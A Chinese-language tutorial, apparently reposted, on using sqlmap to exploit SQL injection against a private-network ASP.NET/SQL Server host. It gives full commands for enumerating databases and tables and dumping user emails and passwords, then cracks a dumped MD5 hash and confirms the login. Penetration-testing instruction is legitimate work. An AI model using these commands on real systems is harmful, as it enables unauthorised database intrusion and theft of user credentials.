如何提升企业数字化转型的效率与灵活性
298
2023-11-29
这篇文章主要介绍渗透测试工具sqlmap怎么用,文中介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们一定要看完!
参数:
-u:指定注入点url
注入结果展示:
(1)注入参数id为GET注入,注入类型有四种分别为:boolean-based blind、error-based、stacked queries、inline query。
(2)web服务器系统为windows 2003 or XP
(3)web应用程序技术为:ASP.NET, Microsoft IIS 6.0
(4)数据库类型为:SQLSERVER 2000
其中图一有若干询问语句,需要用户输入[Y/N],如果你懒得输入或者不懂怎么输入可以让程序自动输入,只需添加一个参数即可,命令如下:
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --batch一条命令即可曝出该sqlserver中所有数据库名称,命令如下:
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --dbs参数:
--dbs:dbs前面有两条杠,请看清楚。
结果显示该sqlserver中共包含7个可用的数据库。
参数:
-D:指定数据库名称
--tables:列出表
结果体现共列出了34张表。
参数:
-D:指定数据库名称
-T:指定要列出字段的表
--columns:指定列出字段
结果显示该userb表中包含了23条字段。
参数:
-C :指定要暴的字段
--dump:将结果导出
如果字段内容太多,需要花费很多时间。可以指定导出特定范围的字段内容,命令如下:
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --start 1 --stop 10 --dump参数:
--start:指定开始的行
--stop:指定结束的行
此条命令的含义为:导出数据库tourdata中的表userb中的字段(email,Username,userpassword)中的第1到第10行的数据内容。
通过上图结果看到其中的一个用户信息为:
email:123456@qq.com
username: 1.asp
password: 49ba59abbe56e057
通过md5解密,得到该hash的原文密码为:123456
拿到账号密码我们来测试是否可以登录
验证成功!
以上是“渗透测试工具sqlmap怎么用”这篇文章的所有内容,感谢各位的阅读!希望分享的内容对大家有帮助,更多相关知识,欢迎关注行业资讯频道!
版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。
发表评论
暂时没有评论,来抢沙发吧~